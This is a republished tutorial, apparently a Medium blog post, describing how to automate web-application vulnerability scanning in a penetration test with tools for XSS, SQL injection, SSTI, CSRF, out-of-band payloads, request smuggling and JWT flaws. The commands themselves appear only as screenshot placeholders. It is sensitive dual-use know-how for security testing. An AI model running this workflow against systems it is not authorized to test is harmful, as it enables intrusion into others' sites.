Automation of the reconnaissance phase during Web Application Penetration Testing III | by Karol Mazurek

Automation of the reconnaissance phase during Web Application Penetration Testing III | by Karol Mazurek

Automation of the reconnaissance phase during Web Application Penetration Testing III

by Karol Mazurek


This article is a continuation of the previous one available at this link and it is the final article in the reconnaissance automation trilogy. After enumerating subdomains, and then selecting one of them and further enumerating in the direction of finding endpoints and queries, it is time to look for bugs.

In this episode, you will learn about the various techniques and tools that will help you detect those misconfigurations of the application being tested. You will also learn how to use them and automate the entire process.

Described research is based on the OWASP methodology and the methodology contained in the book “Hack Tricks” written by Carlos Polop.

One thing to mension — I will not describe those vulnerabilities in this article. Rather I will focus on automation processs. If you are not familiar in described vulnerabilities click on the below links to learn more about each of them and practice how to find and exploit.

  1. Cross-Site Request Forgery (CSRF)
  2. Cryptographic issues in TLS/SSL servers
  3. Cross-Site Scripting (XSS):
    a) Reflected XSS
    b) DOM XSS
    c) Blind XSS
  4. URL rewriting via request header:
    a) X-Rewrite-Url
    b) X-Original-Url
  5. Out-of-bounds interaction (OOB):
    a) Blind Remote Code Execution (RCE)
    b) Blind Cross-Site Scripting (XSS)
    c) Blind SQL injection (SQLi)
    d) Blind Server Side Request Forgery (SSRF)
  6. Server Side Template Injection (SSTI)
  7. Java insecure deserialization
  8. Carriage Return Line Feed Injection (CRLF)
  9. Reflected Open Redirect (OR)
  10. Bypassing 403/401 endpoints
  11. WordPress flaws:
    a) Broken Authentication
    b) Sensitive Data Exposure
    c) Enumeration of Components with Known Vulnerabilities
    d) Scanning Internal Network
    e) Server-side Request Forgery (SSRF)
  12. HTTP request smuggling
  13. Hop-by-hop deletion
  14. Broken links enumeration
  15. SQL injection (SQLi)
  16. JSON Web Tokens flaws (JWT)
  17. Directory Traversal / Path Traversal
  18. Local File Inclusion / Remote File Inclusion (LFI / RFI)

Before starting work, launch a new project in Burp Suite and turn off interception, as shown in the screenshot below:

Source: own study

I assume that you already have a properly prepared catalog with the results from previous article. Correctly configured path with files is presented below:

Source: own study

In case you want to create files for the ad hoc test, the files should contain the following content:

  1. dirs.txt — this file contains urls with directories and files f.e.:
    http://subdomain.example.com/directory1/
    http://subdomain.example.com/directory1/file1
    http://subdomain.example.com/directory2/
  2. params.txt — this file contains urls with queries f.e.:
    http://subdomain.example.com/directory1/file1?query1=a&query2=b
    http://subdomain.example.com/directory1/file2?query3=x&query4=z

Additionally, you will need the ip address of a publicly available web server listening on port 80. If you do not have virtual private server and you do not want to pay for it any money, you can get free 12 months AWS VPS here or spare some money at OVHcloud.

Then you have to unlock port 80 on the firewall. Here is how to do it on AWS EC2 instance and there you can learn how to do it on OVHcloud. If you are equipped with a VPS with port 80 unlocked just start simple HTTP web server. Issue below command in your VPS terminal in order to do that:

Source: own study

The last step is to get the address of the collaborator server. In order to obtain this address, you can use the Burp Suite or create your own private collaborator server.

In this article, I will use the publicly available collaborator provided in the Burp Suite. Follow the steps below, in order to get the address:

Source: own study

One more thing worth mentioning, all the commands that I will show that handle the cookie header will be used with that header. You can use these commands without a cookie or declare them as follows:

Source: own study

Now that you have everything ready, it is time for the right topic, i.e. automation of bugs finding in web applications. First switch to the working directory and manually review content of “params.txt” and “dirs.txt”. Delete the urls that you are not intrested in testing, save changes and start the first tool which crawl main domain and checks for CSRF vulnerabilities. The result of the XSRFProbe will be stored in the directory “csrf-$domain/”.

Tools used:

The screenshot below shows how you can automate this process using bash:

Source: own study

After XSRFProbe has finished, check for misconfiguration in TLS/SSL cryptography. In Bug Bounty programs these kind of vulnerabilities probably will not be accepted, but you should check them anyway as they create a serious security hole for the man in the middle (MITM) attacks. The output of the command will be stored in “testssl.txt” file.

Tools used:

  • testssl.sh

The screenshot below shows how you can automate this process using bash:

Source: own study

The next step will be time consuming, but it may pay off the most in the entire process described. Yes, you are right. It will be fuzzing. The file with parameters “params.txt”, as well as directories and files “dirs.txt” will be fuzzed. First we will deal with the parameters value from “params.txt”. What we are going to do here is for each URL, we put the placeholder “FUZZ” in place of the parameter value. For this purpose we will use my program called crimson_paramjuggler.

Below is an example of an URL with two parameters before and after conversion in order to show what is going on:

Source: own study

After this transformation, a loop is created in which each of the new url is fuzzed with a list under the title “bug” which is constantly updated and modified by me, in order to optimize the fuzzing time and the number of bugs found. You can be download it hereAfter downloading save it as:

  • $HOME/tools/CRIMSON/words/bug

Tools used:

The screenshot below shows how you can automate this process using bash:

Source: own study

The second part of the fuzzing will cover files and directories in “dirs.txt” list:

Source: own study

After completing the fuzzing, merge the “params.txt” and “dirs.txt” into one file “all.txt”. Then perform the rest of the tests on it (in the meantime you can analyze the output of both fuzzings — “bug_params.txt” and “bug_dirs.txt” . Look for anomalies in the response length and the status code).

Tools used:

The screenshot below shows how you can automate this process using bash:

Source: own study

Check for the low hanging fruits — reflected XSS and DOM based XSS on all urls gathered.

Tools used:

The screenshot below shows how you can automate this process using bash:

Source: own study

Then check if the “X-Rewrite-Url” or “X-Original-Url” is being used. For this purpose I have created a tool called crimson_rewriter. As a result you will get a list of all url addresses that supports “X-Rewrite-Url” and “X-Original-Url” headers.

Tools used:

The screenshot below shows how you can automate this process using bash:

Source: own study

The next step will be to test the out-of-bound interactions of each parameter value in the “params.txt” list. In this step, we check several vulnerabilities using RCESQLiblind XSS and SSRF payloads

The wordlist can be downloaded here. After downloading save it as:

  • $HOME/tools/CRIMSON/words/exp/OOB

In order to use it, you can bring into play my next tool called crimson_oobtesterGenerally the wordlist includes payload schemes with “vps_ip” and “domain_collab“ placeholders. Those placeholders will be replaced automatically with the given vps ip and collaborator’s domain address by crimson_oobtester and then send to the given server.

Tools used:

The screenshot below shows how you can automate this process using bash:

Source: own study

Use your virtual private server ip address in place of $vps_ip, domain address of a collaborator in place of $collaborator_domain and save downloaded wordlist with payloads inside the .

crimson_oobtester logs all sent payloads with their identifier and sending time. After the program is finished, check the logs of your web server and compare it with the “oob.txt“ file. Below is an example output of “oob.txt”:

Source: own study

Then run another scanner which will look for DNS interactions by sending POST requests with insecure JAVA deserialization gadget chain payload (URLDNS) in place of parameter values from “params.txt”.

The program will not work without the “ysoserial.jar” file located in:

  • $HOME/tools/ysoserial/ysoserial.jar.

Tools used:

The screenshot below shows how you can automate this process using bash:

Source: own study

After the scan is complete, check DNS interactions on your collaborator server. Each ping will be marked with an identification number in the address of the collaborator’s domain to make it easier to find which exact parameter triggered the interaction and is potentially vulnerable.

Below you can see an example output of a testing 2 urls (the first one has two parameters, therefore it is tested twice):

Source: own study

Here, however, you can see an example of an interaction with a collaborator. Note the number “2” in front of the domain name signaling the interaction triggered by payload:

Source: own study

Then test the injection of CRLF characters in the url path.

Tools used:

The screenshot below shows how you can automate this process using bash:

Source: own study

The next step will be to test the open redirect vulnerability. For this purpose, we are going to use old but gold Wfuzz to fuzz the urls from “dirs.txt and the parameter values from “temp_params.txt” — file previously created by crimson_paramjuggler The test will result in all url addresses that have been redirected stored in “OR.txt” file.

Tools used:

The screenshot below shows how you can automate this process using bash:

Source: own study

Next, test the Server-side Template Injection using crimson_templator which inject SSTI payloads in parameters value from “params.txt” and checks if the payload is evaluated by the server and reflected in response.

Tools used:

The screenshot below shows how you can automate this process using bash:

Source: own study

Then, if you did the reconnaissance described in the second article, you should have a “status_dir.txt” file in which all found url addresses are saved along with the status code of the server’s responses. In this step, we try to bypass security with the help of the DirDar program and get to the directory despite the restrictions.

Tools used:

The screenshot below shows how you can automate this process using bash:

Source: own study

If the website you are testing uses WorPdress, you can use the scanners below to enumerate this CMS and check if there is an SSRF vulnerability, and also bruteforce hidden plugins for further exploitation using the program for static analysis of the source code.

Tools used:

The screenshot below shows how you can automate this process using bash:

Source: own study

In the next steps, such vulnerabilities as HTTP request smugglinghop-by-hop deletionsql injection will be tested and all broken links will be found.

Tools used:

The screenshot below shows how you can automate this process using bash:

Source: own study

The last test will cover the JWT token if it exists. First decode the token to see what is inside, then perform a playbook scan using the provided token directly against the application to hunt for common misconfigurations.

Tools used:

The screenshot below shows how you can automate this process using bash:

Source: own study

Finally, all potentially reflected and DOM based XSS vulnerabilities will be run in the Firefox in order to confirm and manually test the vulnerabilities.

Tools used:

Source: own study

After all the above-mentioned process, it’s time to check the list of output files and hopefully find some bugs:

  1. bug_params.txt — output from parameter fuzzing.
  2. bug_dirs.txt — output from files and directories fuzzing.
  3. vuln_xss — filtered potentially vulnerable urls from XSStrike.
  4. rewriter.txt — list of url addresses that support rewriting headers.
  5. smuggler.txt —urls potentially vulnerable to HTTP request smuggling.
  6. hop_by_hop.txt — output from hop-by-hop deletions test.
  7. broken_links.txt — broken url addresses.
  8. Sqli/ — directory with sqlmap output.
  9. oob.txt — a file used to identify interactions with vps and collaborator.
  10. CRLF.txt — output from CRLFuzzer.
  11. OR.txt — list of url addresses potentially vulnerable to open redirection.
  12. dalfox.txt — output from Dalfox xss scanner.
  13. ssti.txt — urls potentially vulnerable Server-side Template Injection.
  14. wp/ — directory with WordPress scanner results
  15. dirdar.txt — list of url addresses bypassed 403/401 restricted areas.
  16. csrf-$domain/ — directory with CSRF scanner (xsrfprobe) output.
  17. jwt.txt — file with jwt_tool scanner reults.

However, it is not over yet. In the previous article, all urls in both “dirs.txt and “params.txt” were proxyed to the Burp Suite. The tool itself has a lot of built-in automatic scanners, but it is worth adding to so-called extensions.

There are a lot of them, the list of extensions which I recommend to install additionally in the Burp Suite in order to maximize the chances of automatically finding misconfigurations is presented at this link, . You will find there not only automatic scanners, but also many tools that will support your manual work:

As a reminder, at the moment human is irreplaceable, and the tools can be wrong, so after completing the entire process, you should test the application manually according to the WSTG described here. The Autowasp extension will also be helpful.

The above process has been automated in one script called crimson_exploit.
This is one of the three modules that are part of the crimson tool, that I am constantly creating and sharing at Github.

After this whole process, you should have a lot of files with potential vulnerabilities to review. After their analysis and confirmation, proceed to manual testing and exploitation of the vulnerabilities found in order to check their real impact on the business.

This was my last article on web application reconnaissance automation.
If you’re reading this article from the future, a lot could have changed, so I recommend following my project “CRIMSON” on Github, as I try to keep everything up-to-date there.

References:

  1. https://github.com/Karmaz95/crimson
  2. https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
  3. https://book.hacktricks.xyz/pentesting/pentesting-web
  4. https://portswigger.net/web-security/

About the Author:

Karol Mazurek – Penetration Tester, Security Researcher and Bug Bounty Hunter.


The article originally published at: https://karol-mazurek95.medium.com/automation-of-the-reconnaissance-phase-during-web-application-penetration-testing-iii-2823b16f38cc

The post Automation of the reconnaissance phase during Web Application Penetration Testing III | by Karol Mazurek appeared first on eForensics.